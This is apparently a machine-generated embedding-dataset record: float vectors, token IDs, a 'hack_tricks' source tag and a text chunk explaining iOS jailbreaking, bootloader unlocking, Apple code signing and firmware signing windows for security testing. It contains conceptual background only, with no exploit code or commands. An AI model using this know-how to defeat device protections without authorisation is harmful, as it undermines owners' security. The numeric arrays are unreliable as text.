1.0592498779296875, -0.20083282887935638, -0.3471736013889313, -0.17330114543437958, -0.06821266561746597, 0.5441411733627319, -0.2860111594200134, -0.15851648151874542, -0.6051190495491028, 0.3709786534309387, -0.0017035220516845584, -0.20748500525951385, 0.6500785946846008, 0.05787225067615509, -0.43005138635635376, 0.14050212502479553, -0.9344286918640137, -0.5755686163902283, -0.1032562404870987, 0.02900243178009987, 0.4666000008583069, 0.2626134753227234, 0.6750659942626953, -0.14912332594394684, -0.508887529373169, -0.07385995984077454, 0.26837995648384094, 0.6156741976737976, -0.01381137128919363, 0.6738941669464111, 0.42851516604423523, -0.06029805913567543, -0.4569392204284668, -0.5295798778533936, 0.30775320529937744, 0.3299928903579712, -0.2379271686077118, 0.2595647871494293, -0.3096495270729065, 0.3153368830680847, 0.5572618246078491, 0.07709921896457672, -0.7815870046615601, 0.8299617767333984, 0.37402644753456116, 0.7375692129135132, -0.15484581887722015, -0.029427094385027885, 0.04014059528708458, -0.4729067385196686, 0.10663262009620667, 0.2526572644710541, -0.4943186640739441, -0.737056314945221, -0.7015790343284607, -0.10352285951375961, -0.4232029616832733, 0.14795590937137604, 0.8167567849159241, 0.13521748781204224, -0.7139204740524292, -0.6968846321105957, -0.7635648250579834, 0.5867919921875, 0.9685015678405762, 0.7346391081809998, 0.4390968084335327, 0.5165039896965027, 0.6114009022712708, -0.4463671147823334, 0.32466360926628113, -0.882714569568634, -0.09378240257501602, 0.05559882894158363, 0.5739215016365051, -0.6041197180747986, -0.38723108172416687, -0.2821294069290161, 0.11615987867116928, -0.5230691432952881, -0.5375763773918152, -0.09428423643112183, 0.7765145301818848, -0.8136597871780396, -0.5542652010917664, -0.9215556383132935, 0.1312045454978943, -0.9620437622070312, -0.2351197898387909, -0.887810468673706, 0.18494819104671478, 0.9212568402290344, -0.18539391458034515, -0.23720602691173553, -0.1607968956232071, -0.00027259477064944804, 0.09585457295179367, -0.5233983397483826, -0.0008941030246205628, -0.8376074433326721, -0.7328034043312073, -0.38175368309020996, -0.345670610666275, 0.4005335867404938, -0.049508556723594666, 0.02568827010691166, -0.8786423206329346, -0.19619247317314148, 0.643027663230896, -0.2748481333255768, -0.10617846250534058, -0.14701597392559052, 0.06941293925046921, 0.1558532863855362, 0.4427270293235779, -0.12931057810783386, 0.1686815619468689, 0.28152167797088623, -0.9513421654701233, 0.3401889503002167, -0.4583841860294342, -0.014361162669956684, -0.06542105972766876, 0.33103489875793457, -0.39074036478996277, 0.35750657320022583, -0.574955940246582, 0.302614688873291, -0.3101908564567566, 0.43437835574150085, -0.08100345730781555, -0.2344665825366974, 0.1572418063879013, -0.32119643688201904, 0.020960422232747078, 0.0719180703163147, 0.5177100896835327, -0.11518139392137527, 0.4201112389564514, -0.39980587363243103, -0.8149799704551697, 0.5316663980484009, -0.3900946378707886, 0.5860616564750671, -0.2355508804321289, 0.15915638208389282, -0.31348326802253723, -0.6166073679924011, 1.0323598384857178, -0.0074590761214494705, 0.24115315079689026, -1.290916919708252, -0.07199188321828842, -0.1189689189195633, -0.2570750117301941, -0.18273000419139862, 1.200528860092163, -0.22546087205410004, -0.9879917502403259, -0.17726510763168335, 0.451495885848999, -0.13402865827083588, -0.3431943655014038, -0.7942858338356018, 0.0886600911617279, -0.04335113987326622, -0.2604171931743622, -0.05301457643508911, 0.344794899225235, -0.22860091924667358, 0.46629178524017334, -0.31819936633110046, -0.11326761543750763, -0.7175220847129822, 0.330566942691803, 0.12875691056251526, 0.06430459022521973, -0.4971540570259094, 0.24775747954845428, -0.3117969036102295, -0.1140761598944664, -0.3083883225917816, 0.630658745765686, 0.22819258272647858, -0.3040441870689392, -0.22147834300994873, 0.3151731491088867, -0.07677628099918365, -0.17748785018920898, -0.11878664791584015, 0.015160772018134594, -0.5223844051361084, -0.2568225860595703, -0.25410547852516174, -0.2786693572998047, -0.36408379673957825, -0.12471792101860046, 0.547835648059845, -0.3730144202709198, 0.3174334466457367, -1.1274189949035645, -0.8950161337852478, -0.7535768151283264, 0.239346444606781, -0.052656471729278564, -0.8631969094276428, 0.1856335997581482, -0.2244575023651123, 0.23038315773010254, -0.20129120349884033, 0.36585044860839844, -0.5815867781639099, 0.5460940003395081, -0.008764182217419147, -0.12587285041809082, 0.045555151998996735, 0.12036706507205963, 0.32757434248924255, 0.02401825599372387, 0.5092430114746094, -0.3533107042312622, -0.3271757662296295, 0.17493636906147003, -0.1659052073955536, -0.06493648886680603, -0.9261110424995422, 1.189864158630371, -0.20693901181221008, 0.31978192925453186, -0.3332718312740326, -0.26859262585639954, 0.6020755767822266, -0.30106720328330994, 0.09962005168199539, 1.0620856285095215, 0.6226069331169128, -0.810705304145813, 0.606380045413971, 0.35463690757751465, 0.9851689338684082, 0.17946648597717285, -0.2180011123418808, -0.8420004844665527, 0.5317857265472412, -0.5751005411148071, -0.8886260390281677, 0.3827463984489441, 0.12243720889091492, 0.17607277631759644, 0.2927166223526001, -0.5508674383163452, 0.4621938467025757, -0.3046754002571106, 0.047164272516965866, 1.014280080795288, 0.2269740253686905, 0.1431707888841629, -0.24987471103668213, 0.3781214952468872, 0.3477925956249237, 0.3007441461086273, 0.36311042308807373, -0.3583253026008606, 0.07684221118688583, 0.4918792247772217, -0.09179598093032837, -0.10149607062339783, -0.9788471460342407, 0.09908834844827652, 0.20835645496845245, 0.022557206451892853, 0.27739962935447693, 0.3610602021217346, -1.2664189338684082, -0.030911963433027267, -0.5034288763999939, -0.5464926362037659, 0.4592169523239136, 0.5879208445549011, 0.9564663767814636, 0.21361203491687775, 0.03605543449521065, 0.32581567764282227, -0.1287645548582077, -0.2629574239253998, 0.4471133351325989, 0.2721332609653473, -0.4055842161178589, 0.9491152763366699, 0.506958544254303, -0.9532649517059326, -0.39448025822639465, -0.11830258369445801, 0.0961165800690651, 0.0009970475221052766, -0.23100823163986206, -0.01022637914866209, 0.14291417598724365, -0.7689485549926758, 0.035070136189460754, 0.28939738869667053, -0.05739837884902954, 0.29225918650627136, -0.5258384346961975, 0.2771225571632385, -0.25661712884902954, 0.08349549025297165, 0.6432881951332092, -1.0141735076904297, -0.48853498697280884, -0.6281876564025879, -0.21841900050640106, 0.24222902953624725, -0.07508695870637894, 1.0313862562179565, -0.7808334231376648, -0.07869582623243332, 0.08598341792821884, 0.10013183951377869, 0.14255845546722412, 0.7232719659805298, 0.1769653856754303, 0.27313312888145447, 0.3167736232280731, -1.2996715307235718, -0.5128835439682007, 0.44070255756378174, -0.3881082832813263, 0.1676681637763977, -0.6803772449493408, 0.4030865728855133, -0.44646531343460083, 0.8042793869972229, -0.3653963804244995, -0.3682066798210144, -0.8354693651199341, -0.16562773287296295, 0.11537343263626099, -0.11973685026168823, -0.18355193734169006, -0.7303404211997986, 0.3309832811355591, 0.09973622858524323, -0.4773809611797333, 0.0030031774658709764, 0.3955194652080536, -0.27378687262535095, 0.013913742266595364, -1.0909075736999512, 0.8278599381446838, -0.4871170222759247, -0.6882176399230957, -0.12564505636692047, -0.9348064064979553, -0.2424120306968689, -0.39241349697113037, -0.4588561952114105, -0.04149932786822319, -0.49123165011405945, 0.6824756264686584, -0.9257498979568481, -0.40874505043029785, -0.1798180341720581, -0.4332047998905182, 0.2449904978275299, 0.5211867690086365, -0.5021941065788269, -0.15729203820228577, -0.031903497874736786, 0.9924610257148743, 0.6261810660362244, -0.6475229263305664, 0.629116415977478, -0.18151125311851501, 0.5525177717208862, 0.22597341239452362, 0.13391874730587006, 0.39494389295578003, 0.7247862219810486, 0.16178952157497406, -0.6991980075836182, 0.05045972019433975, -0.19992683827877045, 0.04976755380630493, -0.02934017777442932, -0.2295711785554886, 0.0529024638235569, 0.7680836915969849, 0.3318856358528137, 0.3152202367782593, -0.1412370502948761, 0.40858739614486694, 0.4398221969604492, -0.06334749609231949, 0.1432916522026062, 0.23205764591693878, -0.1658284217119217, -0.44229981303215027, -0.3552986681461334, -0.2952439486980438, -0.4619152843952179, 0.3180474042892456, -0.2530074417591095, 0.4053395986557007, 0.31349948048591614, -0.5655770897865295, 0.039700623601675034, 0.1251571774482727, 0.19827215373516083, 0.32275187969207764, 0.520613968372345, 0.06392765790224075, -0.9141109585762024, -0.009874183684587479, -1.0343728065490723, -0.15824271738529205, 0.7427123785018921, -0.45732036232948303, -0.7172759771347046, -0.5413492321968079, 0.24458879232406616, 0.161380797624588, 0.2534535527229309, -0.0167881827801466, 0.34826570749282837, 0.2634427547454834, -0.0845898762345314, 0.3318789303302765, -0.7335631847381592, -0.7889353036880493, 0.06471755355596542, 0.49064019322395325, 0.013958178460597992, -0.7746702432632446, 0.6010966897010803, 1.0727860927581787, 0.5929754972457886, 0.05090460181236267, -0.5321067571640015, -0.426505982875824, 0.5433420538902283, 0.0003690262674354017, 1.0397627353668213, 0.09268543124198914, -0.9049912095069885, 0.357535183429718, -0.8224491477012634, 0.9237179756164551, 0.26764506101608276, -0.1908634901046753, 0.402336984872818, 0.11201544851064682, -0.3763396441936493, 0.5292503237724304, -0.4220324456691742, -0.2632630169391632, 0.7274314165115356, -0.3038572669029236, 0.7587004899978638, -0.30069106817245483, 0.17706574499607086, -0.4226854145526886, 0.6471549868583679, 0.04900820553302765, -0.1179419532418251, -0.792893648147583, 0.2452574372291565, 0.30280372500419617, -0.45742982625961304, 0.5419043302536011, 0.18106253445148468, 0.023995481431484222, -0.08796249330043793, 0.35055550932884216, -0.5809814929962158, -0.017879826948046684, 0.5802785158157349, -0.6157655715942383, 0.16431879997253418, -0.05768857151269913, 0.16086265444755554, 0.0023740457836538553, 0.41438406705856323, 0.813693106174469, -0.8888177275657654, 1.0330300331115723, 0.44308149814605713, -0.21255433559417725, 0.5357221364974976, -0.16530467569828033, -0.7728936076164246, 0.1998642534017563, 0.8002935647964478, 0.42967405915260315, -0.24192094802856445, 0.39644408226013184, -0.2729519307613373, -0.3582035005092621, 0.7716757655143738, 0.38761216402053833, -0.9334149360656738, 0.2820234000682831, -0.07084839791059494, -0.9996119737625122, -0.37794235348701477, -0.06534098833799362, 0.22637343406677246, -0.6857659220695496, 0.39430055022239685, -0.5146657228469849, -0.06540650874376297, -0.330035001039505, 0.2719535827636719, -0.4216957688331604, 0.08765161782503128, -0.2083742618560791, -0.7901905179023743, -0.2031051367521286, 1.0156939029693604, 0.06309487670660019, 0.6477518677711487, 0.02945881150662899, 0.1568038910627365, 0.3499799072742462, 0.22451356053352356, -0.09444594383239746, -0.12843288481235504, 0.2711111605167389, -0.5795130133628845, -0.2051246017217636, 0.017863459885120392, -0.31701675057411194, 0.085355743765831, 0.8474483489990234, -0.07357100397348404, -0.4311410188674927, -0.26091068983078003, 0.3109283745288849, -0.3007325828075409, -0.7032812237739563, -0.1895349621772766, -0.2845050096511841, -0.39775732159614563, 0.7832252979278564, -0.1885727196931839, 0.13013499975204468, 0.34111666679382324, -0.3327721655368805, -0.23302339017391205, -0.5771936178207397, -0.6552371978759766, -0.30007994174957275, 0.8918691277503967, -0.044053733348846436, -0.14763352274894714, 0.2001858353614807, -0.5733883380889893, -0.63238126039505, 0.4328792691230774, 0.33388879895210266, -0.046606872230768204, 0.4781055152416229, -0.11068400740623474, 0.5776057839393616, 0.9624871611595154, 0.1763724833726883, -0.5659027099609375, 0.541530430316925, 0.9075449109077454, -0.4819619655609131, 0.42302384972572327, 0.13075467944145203, 0.11996942013502121, -0.03314013406634331, -0.33919525146484375, 0.19943927228450775, -0.6807076930999756, -0.030000247061252594, 0.3299592435359955, -0.4974461495876312, -0.8768027424812317, -0.14760880172252655, -0.759747326374054, -0.01589331030845642, -0.22276122868061066, 0.8664214611053467, -0.6231426000595093, 0.010424834676086903, -0.39852872490882874, 0.12772279977798462, 0.06635362654924393, -0.19858282804489136, 0.6129762530326843, 0.1594240367412567, 0.767637312412262, -1.6273819208145142, 4.399742603302002, 0.18063688278198242, -0.04311992973089218, 0.6748282313346863, 0.07770629227161407, 0.30448809266090393, 1.1136903762817383, -0.6875478625297546, 0.2974134683609009, -0.10483147203922272, -0.3784262537956238, -0.610817015171051, 0.8510770797729492, 0.36088448762893677, -0.04623189568519592, 0.71741783618927, -0.36840811371803284, -0.13422195613384247, 0.7566751837730408, -0.4043213129043579, -0.686603307723999, 0.12825192511081696, -0.4296480417251587, 0.959795355796814, 0.5829235315322876, 0.43296533823013306, 0.04318619892001152, -0.43181318044662476, -0.40599554777145386, 0.016309011727571487, 0.22034084796905518, -0.32331982254981995, -0.00018865424499381334, 0.18680284917354584, 0.09835659712553024, 0.298443078994751, 0.710644543170929, -0.08970048278570175, -0.5122350454330444, 0.7175981998443604, 0.17020434141159058, -0.3468612730503082, 0.04234330356121063, 0.22852174937725067, 0.11522660404443741, 0.9448431730270386, -0.4789813756942749, -0.12515108287334442, 0.7117742300033569, 0.018262136727571487, 0.5296193361282349, -0.02540908381342888, 0.4367581605911255, -0.20073549449443817, -0.36190205812454224, 0.5671533942222595, -0.09207053482532501, -0.3384222388267517, -0.09307824820280075, -0.3414223790168762, 0.7805928587913513, -1.185612440109253, -0.04166368767619133, -0.35090532898902893, -0.9170712828636169, 0.372780442237854, -0.749009370803833, 1.1789501905441284, 0.046835023909807205, -0.34762877225875854, -0.4845696687698364, -0.35160741209983826, -1.0676912069320679, -0.687019944190979, 0.42744776606559753, -0.32467424869537354, -0.1031641736626625, 0.16864538192749023, -0.0008421397069469094, -0.7500452399253845, 0.16427908837795258, -0.6772674918174744, -0.3741528391838074, 0.21691225469112396, 1.0058424472808838, 0.19411547482013702, -0.28326505422592163, -0.6366869807243347, 0.8850259780883789, -0.11100887507200241, 0.48040491342544556, 0.44887492060661316, 0.29729434847831726, -0.32194244861602783, -0.10646768659353256 ]
[ 1999, 1013, 5198, 1013, 1026, 5310, 18442, 1028, 1013, 3075, 1013, 9722, 1013, 25562, 5714, 20350, 1013, 5733, 3406, 2330, 1996, 25837, 1010, 2448, 1060, 16044, 1010, 2059, 2811, 1999, 1996, 1060, 16044, 21628, 1011, 1011, 1028, 2330, 9722, 5906, 1011, 1011, 1028, 25837, 1035, 1035, 1999, 1996, 2206, 3746, 22042, 1999, 1000, 26322, 3543, 1031, 1012, 1012, 1012, 1033, 1000, 2017, 2064, 7276, 2060, 5080, 2000, 3231, 1999, 1024, 5097, 1999, 1996, 25837, 7076, 5178, 1013, 5198, 1013, 1026, 5310, 18442, 1028, 1013, 3075, 1013, 9722, 1013, 25562, 5714, 20350, 1013, 5733, 2017, 2089, 2424, 2035, 1996, 5361, 25837, 2015, 1012, 2065, 2017, 2215, 2000, 3229, 1996, 6764, 1997, 2019, 4646, 2580, 2503, 2028, 1997, 1996, 7861, 20350, 2015, 2009, 2453, 2022, 3697, 2000, 2113, 1999, 2029, 2028, 1996, 10439, 2003, 5361, 1012, 1037, 4248, 2126, 2000, 2424, 1996, 6149, 21318, 2094, 2003, 2000, 15389, 1996, 10439, 1999, 1996, 25837, 1998, 15389, 1024, 1060, 26775, 4609, 21934, 6593, 2140, 2862, 1064, 24665, 13699, 9573, 2098, 18059, 1022, 1006, 28939, 2629, 2850, 2549, 2546, 2620, 1011, 1020, 19473, 1011, 1018, 5243, 2692, 1011, 8670, 16048, 1011, 1021, 2063, 2509, 10354, 2094, 16048, 2278, 2692, 2575, 2278, 1007, 1006, 9573, 2098, 1007, 2320, 2017, 2113, 1996, 21318, 2094, 1996, 18726, 5361, 2306, 2009, 2064, 2022, 2179, 1999, 1013, 5198, 1013, 1026, 5310, 18442, 1028, 1013, 3075, 1013, 9722, 1013, 25562, 5714, 20350, 1013, 5733, 1013, 1063, 21318, 2094, 1065, 1013, 2951, 1013, 16143, 1013, 2951, 1013, 4646, 14406, 22507, 1010, 10889, 2017, 2180, 1005, 1056, 2424, 1996, 4646, 2182, 1012, 2017, 2342, 2000, 3229, 1013, 5198, 1013, 1026, 5310, 18442, 1028, 1013, 3075, 1013, 9722, 1013, 1060, 16044, 1013, 5173, 2850, 2696, 1013, 1063, 4646, 1065, 1013, 3857, 1013, 3688, 1013, 2139, 8569, 2290, 1011, 18059, 5332, 12274, 20051, 2953, 1013, 1998, 1999, 2023, 19622, 2017, 2064, 2424, 1996, 7427, 1997, 1996, 4646, 1012, 7861, 20350, 17345, 6894, 2819, 2003, 1996, 2069, 7271, 2800, 16380, 7861, 20350, 1012, 2009, 2003, 2019, 6960, 7842, 3022, 5576, 2007, 1037, 2566, 5310, 6105, 2944, 1998, 2515, 2025, 3749, 2151, 3979, 6105, 1012, 7173, 4783, 15495, 23804, 9975, 5942, 2008, 1996, 3642, 2770, 2006, 1996, 18059, 2442, 2022, 2772, 2011, 1037, 8196, 3843, 2011, 6207, 1012, 7173, 23890, 2075, 2003, 1996, 2832, 1997, 8851, 25022, 11890, 2819, 26703, 2107, 9259, 1998, 2060, 3036, 7711, 2404, 1999, 3182, 2011, 1996, 9808, 1012, 3568, 1010, 2320, 1996, 5080, 2003, 7173, 29162, 1010, 1996, 11109, 4638, 2029, 2003, 3625, 2005, 9361, 18726, 2108, 5361, 2003, 8983, 2098, 2061, 2009, 2003, 27539, 1012, 4406, 11924, 1010, 2017, 3685, 6942, 2000, 1000, 9722, 5549, 1000, 1999, 16380, 2000, 2448, 27121, 1013, 4895, 24669, 2098, 3642, 2006, 1996, 5080, 1012, 7117, 1999, 11924, 7831, 10735, 7173, 23890, 2075, 2003, 2411, 4102, 2000, 11924, 7117, 2075, 1010, 2021, 1996, 2832, 2003, 2941, 3243, 2367, 1012, 2000, 4863, 1996, 4489, 1010, 2057, 1005, 2222, 2034, 3319, 1996, 8474, 1997, 1000, 7117, 2075, 1000, 1998, 1000, 12659, 1000, 2006, 11924, 1012, 7117, 2075, 1024, 2023, 4050, 7336, 23658, 1996, 10514, 12441, 2006, 1996, 2291, 2030, 6419 ]
hack_tricks
431.txt
1
the whole system with a rooted custom rom. exploits aren't required to obtain root access as long as the bootloader is accessible. flashing custom roms : this allows you to replace the os that's running on the device after you unlock the bootloader. the bootloader may require an exploit to unlock it. on ios devices, flashing a custom rom is impossible because the ios bootloader only allows apple - signed images to be booted and flashed. this is why even official ios images can't be installed if they aren't signed by apple, and it makes ios downgrades only possible for as long as the previous ios version is still signed. the purpose of jailbreaking is to disable ios protections ( apple's code signing mechanisms in particular ) so that arbitrary unsigned code can run on the device ( e. g. custom code or downloaded from alternative app stores such as cydia or sileo ). the word " jailbreak " is a colloquial reference to all - in - one tools that automate the disabling process. jailbreaking considerationsjailbreaking an ios device is becoming more and more complicated because apple keeps hardening the system and patching the exploited vulnerabilities. jailbreaking has become a very time - sensitive procedure because apple stops signing these vulnerable versions relatively soon after releasing a fix ( unless the jailbreak benefits from hardware - based vulnerabilities, such as the limera1n exploit affecting the bootrom of the iphone 4 and ipad 1 ). this means that you can't downgrade to a specific ios version once apple stops signing the firmware. if you have a jailbroken device that you use for security testing, keep it as is unless you're 100 % sure that you can re - jailbreak it after upgrading to the latest ios version. ios upgrades are based on a challenge - response process ( generating the so - called shsh blobs as a result ). the device will allow the os installation only if the response to the challenge is signed by apple. this is what researchers call a " signing window ", and it is the reason you can't simply store the ota firmware package you downloaded and load it onto the device whenever you want to. during minor ios upgrades, two versions may both be signed by apple ( the latest one, and the previous ios version ). this is the only situation in which you can downgrade the ios device. you can check the current signing window
[ 0.06514552980661392, -0.36643511056900024, -0.19737815856933594, 0.19243671000003815, -0.2643674910068512, -0.557282567024231, 0.07211808115243912, -0.12815158069133759, 0.43172985315322876, 0.9959077835083008, 0.4617280066013336, 0.2509250044822693, 0.26806461811065674, -0.40194857120513916, -0.18142034113407135, 0.028351647779345512, -0.7803233861923218, 0.3941200375556946, -0.32518574595451355, -0.3935096859931946, 0.47373297810554504, -0.219575896859169, -0.23879776895046234, -0.5841431021690369, -0.07342290878295898, 0.2616023123264313, 0.9011321663856506, 0.5213021636009216, 0.49329742789268494, 1.3408524990081787, 0.216517835855484, 0.20982258021831512, 0.11314407736063004, -0.6123703718185425, 0.15265722572803497, 0.2574833631515503, 0.6141276359558105, -0.21882465481758118, -0.2898758053779602, -0.9682687520980835, 0.708480954170227, -0.24829836189746857, -0.11093511432409286, -0.14240609109401703, -1.02567720413208, -0.29521697759628296, -0.0289204902946949, -0.09785152226686478, 0.2150321900844574, -0.23958203196525574, 0.021153701469302177, 0.36952322721481323, -0.263658344745636, 0.5901600122451782, 0.45883825421333313, 0.2600346505641937, 0.5951471924781799, -0.23096565902233124, -0.023964857682585716, 0.902448296546936, -0.35430657863616943, 0.5016985535621643, 0.3387387990951538, -1.0029792785644531, 0.06533077359199524, 0.8881436586380005, -0.3863987326622009, -0.6118131875991821, -0.20567265152931213, -0.499538779258728, -0.2868421673774719, 0.7150641679763794, 0.28482118248939514, -0.8419906497001648, -0.4410085082054138, -0.11806783080101013, -0.43151211738586426, -0.5708330869674683, -0.07940501719713211, 0.5931951403617859, 0.2772105038166046, 0.7053300738334656, 0.09360556304454803, -0.14651252329349518, -0.2528410851955414, 0.3135695457458496, 0.12117529660463333, 0.012813273817300797, -0.6675413250923157, -0.027375856414437294, 0.1920902132987976, 0.5157586336135864, -1.0393903255462646, -0.16930148005485535, 0.5905779600143433, 0.9653339385986328, -0.741062581539154, -0.09472538530826569, 0.31303757429122925, 0.07265035063028336, 0.6820314526557922, 0.4066292345523834, 0.23057162761688232, 0.3396986424922943, -0.3552292585372925, 0.32098227739334106, 0.5839165449142456, -0.33220142126083374, -0.02618597261607647, -0.47763925790786743, 0.500511109828949, -0.01230635680258274, 0.0121418796479702, -0.5633869171142578, -0.5168260931968689, 0.06578025221824646, 0.9370447993278503, 0.21103714406490326, -0.258412629365921, 0.9021008014678955, -0.03292669355869293, -0.4306909441947937, 0.4769692122936249, 0.07320552319288254, -0.055138811469078064, 0.04170631617307663, 0.614590585231781, 0.40835657715797424, -0.15458473563194275, -0.06904006004333496, -0.0969914048910141, -0.04532555863261223, 0.106944240629673, 1.4006515741348267, -0.8241544961929321, 0.013300123624503613, 0.44870254397392273, 0.25964921712875366, 0.028774309903383255, -1.0113810300827026, -0.40428152680397034, 0.23952755331993103, -0.18738114833831787, 0.8041265606880188, 0.5350803136825562, 0.12135247141122818, -0.3648138642311096, 0.2566182017326355, -0.48320233821868896, -0.14329344034194946, 0.45766910910606384, 0.5939223170280457, 0.9044361114501953, 0.0053123002871870995, -0.30431073904037476, 0.4201342463493347, -0.6778536438941956, 0.7896469235420227, -0.5675131678581238, 0.05640246346592903, 0.23435835540294647, 0.3958221673965454, 0.35970941185951233, 0.16988442838191986, -0.3775579035282135, 0.3444114327430725, -0.7136159539222717, -0.4782995283603668, 0.005626955535262823, 0.463888943195343, 0.12578102946281433, 0.04751390591263771, -0.22690092027187347, -0.18380197882652283, 1.1804698705673218, 0.9587817192077637, -0.20747436583042145, 0.1919979304075241, 0.19933955371379852, 0.16181835532188416, -0.5329442620277405, 0.21254175901412964, 0.5453225374221802, 0.5176568031311035, -0.1390911489725113, 0.4239981770515442, 0.20962423086166382, -0.3292747437953949, 0.088520348072052, -0.3165087103843689, -0.6936349868774414, 0.8219782710075378, -0.5756862759590149, 0.4957757592201233, 0.7162538766860962, -0.21095997095108032, -1.1012139320373535, -0.33106526732444763, -0.48255038261413574, -1.3277620077133179, -0.3519672155380249, -0.21137115359306335, 0.21967463195323944, 0.22038152813911438, -0.046835776418447495, -0.6784507036209106, 0.9781166911125183, 0.6336317658424377, 0.42713451385498047, 0.697992205619812, 0.37757638096809387, -0.27411267161369324, -0.6401665210723877, 0.15703184902668, -0.24588604271411896, 0.03864765912294388, 0.5860192775726318, 0.41159912943840027, -0.15756727755069733, 0.10956191271543503, 0.1298370063304901, 0.4628525376319885, 1.1153252124786377, 0.028969306498765945, -0.4663407504558563, -0.18192759156227112, 0.05542435124516487, 0.021963676437735558, -0.3387017846107483, -0.2676171362400055, -0.14165207743644714, 0.7792761921882629, 0.5241711735725403, 1.0398051738739014, -0.05189475417137146, -0.5974088311195374, -0.2362639456987381, 0.09322233498096466, 0.33899351954460144, -0.5742821097373962, 0.025933440774679184, 0.958863377571106, 0.2918630838394165, -0.2603150010108948, 0.7584426999092102, 0.30346667766571045, -0.016441838815808296, 0.5913546085357666, 0.8612671494483948, 0.895168125629425, -0.4752301275730133, 0.4855954647064209, 0.42315158247947693, -0.4534872770309448, -0.5877054929733276, -0.8856005668640137, 0.13296666741371155, 0.6426289081573486, -0.41496872901916504, -0.7582561373710632, 0.13469600677490234, -0.15562604367733002, -0.3816216289997101, 0.25222742557525635, 0.2515616714954376, 1.0320186614990234, -0.7567923069000244, 0.8184280395507812, -0.1992984265089035, -0.2447361946105957, -1.112330675125122, -0.01073536928743124, -1.0018651485443115, -0.5444165468215942, -1.1808795928955078, -0.044668663293123245, 0.20300103724002838, -0.37720823287963867, 0.7013644576072693, -0.6971873641014099, -0.4419187009334564, 0.08915918320417404, 1.5364904403686523, 0.1791786402463913, -0.09197387844324112, 0.2483382225036621, -0.42969340085983276, 0.29695335030555725, -0.036903392523527145, 0.6295284032821655, 0.021822012960910797, 0.007172086276113987, -0.19902479648590088, -0.45826202630996704, 0.038690418004989624, -0.1610340029001236, 0.8584508895874023, 0.6212671995162964, -0.17807184159755707, 0.09821312129497528, 0.03808765113353729, -0.014198030345141888, -0.11032336205244064, 0.478336364030838, -0.5483690500259399, 0.37529346346855164, 0.1912473440170288, -0.42888665199279785, 0.6962344646453857, 0.10081563144922256, -1.0574299097061157, 0.17067764699459076, 0.12164124101400375, 0.8180696964263916, -0.4544013440608978, 0.5127780437469482, 0.07333076745271683, 0.012311373837292194, -0.11741872131824493, -0.04956117644906044, -0.11192050576210022, -0.6125513911247253, -0.08281339704990387, -0.19849549233913422, 0.12950214743614197, -0.1282818764448166, 0.009571650996804237, -1.5661379098892212, 0.3855610191822052, -0.17128236591815948, -0.10603290796279907, -0.12170034646987915, 0.11163379997015, 1.4593758583068848, 0.10167492926120758, 0.03252597153186798, -0.1505802422761917, -0.38826248049736023, 0.06319521367549896, 1.1230653524398804, -0.16962581872940063, -0.5219264626502991, 0.5401919484138489, -0.22341078519821167, 0.1593787670135498, 0.649297833442688, 0.24499459564685822, -0.5564301013946533, -0.35820651054382324, -0.06769739091396332, -0.20072120428085327, -0.277251273393631, -0.03563356399536133, 0.1911470741033554, 0.9764831066131592, 0.5570949912071228, -0.40000447630882263, -0.20305493474006653, -0.041275009512901306, 0.301453173160553, 0.19453300535678864, -0.11563748866319656, 0.1605740189552307, 0.36069461703300476, -0.626055896282196, -0.20663723349571228, -0.209361732006073, 0.24936579167842865, 0.6624727249145508, 0.18325580656528473, 0.48162660002708435, -0.4946986734867096, -0.28047046065330505, 0.7584097385406494, -0.43304121494293213, -0.7206478118896484, 0.4556376039981842, 0.31329166889190674, 0.5457404255867004, -0.3455517888069153, 0.34802061319351196, -0.504588782787323, -0.19196802377700806, 0.49901050329208374, 0.6367231011390686, -0.1890033781528473, -0.26397019624710083, -0.12651985883712769, -0.3522382080554962, -0.14964380860328674, 0.19411151111125946, 0.12018818408250809, 0.5118184685707092, -0.2973397672176361, -1.035499930381775, -0.5648715496063232, 0.8794446587562561, 1.058901071548462, 0.672154426574707, 0.21570733189582825, 0.9657747149467468, 0.36339688301086426, -0.7162509560585022, 0.4509522616863251, -0.7441786527633667, 0.2482917755842209, -0.19738370180130005, 0.9715427756309509, -0.534182071685791, -0.00643908092752099, -0.07721347361803055, -0.23421575129032135, -0.4815669357776642, -0.2817612588405609, -0.485918253660202, -0.05220213159918785, -0.11798597872257233, -0.42338016629219055, -0.22610734403133392, 0.14583022892475128, -0.8825480937957764, -0.23655852675437927, -0.805626392364502, 0.1872476041316986, 0.6957273483276367, -0.6223104000091553, 0.09567725658416748, -0.34238100051879883, 0.4616854190826416, 0.2782171666622162, 0.24930554628372192, -0.23579666018486023, -0.3811010420322418, -0.7541779279708862, -0.6312291026115417, -0.191446453332901, 0.686892032623291, 0.23354235291481018, -0.15637464821338654, -0.23753966391086578, -0.32359638810157776, 1.0504176616668701, -0.40004611015319824, -0.7351588606834412, -0.1300923228263855, 0.20245227217674255, 0.2508518099784851, 0.27905988693237305, -0.4518270790576935, -0.027016060426831245, -0.04489905759692192, -1.5667952299118042, 0.6540661454200745, -0.7202432751655579, -0.06800263375043869, -0.12720921635627747, 0.04374980553984642, 0.005042914301156998, 0.44046953320503235, -0.4876674711704254, 0.12081634998321533, -0.7742508053779602, -0.2599254250526428, -0.47879743576049805, -0.3542194664478302, 0.4653773009777069, -0.14657245576381683, -0.3194766938686371, 0.08450949192047119, 0.6449021697044373, -0.344863623380661, 0.39493751525878906, -0.7121734619140625, -0.6780216097831726, 0.450300931930542, -0.7649699449539185, 0.5166321992874146, 0.3771570920944214, -0.039078257977962494, -0.45637544989585876, 0.014518537558615208, 0.9200406670570374, 0.0363151840865612, 0.7142283320426941, -1.3935147523880005, -0.41752567887306213, 0.16499100625514984, -0.23814845085144043, 0.09994316846132278, 0.5899980664253235, 0.09402701258659363, 0.22194914519786835, -0.1607377678155899, -0.17542028427124023, -0.2520006597042084, -0.5927048921585083, -0.7383993864059448, -0.22568395733833313, 0.12545153498649597, -0.6745849251747131, 0.4324888586997986, 0.5140988826751709, -0.07629187405109406, 0.056162893772125244, -0.15468136966228485, -0.4732920825481415, -1.0349845886230469, -0.5961880683898926, -0.08121666312217712, 0.23705656826496124, -0.21910738945007324, -0.2030199021100998, -0.0647299513220787, 0.16529138386249542, 0.010340001434087753, 0.48753857612609863, 0.8037065863609314, -0.26678285002708435, -0.5617207288742065, 0.542682409286499, 0.036514461040496826, 0.07892588526010513, 0.038540977984666824, 0.2184164822101593, -0.17572803795337677, -0.5853574872016907, -0.4885246753692627, -0.4771571159362793, -0.7508342266082764, -0.8772980570793152, 0.43733957409858704, -0.6793918609619141, 0.46288636326789856, -0.4712885320186615, -0.5227774381637573, 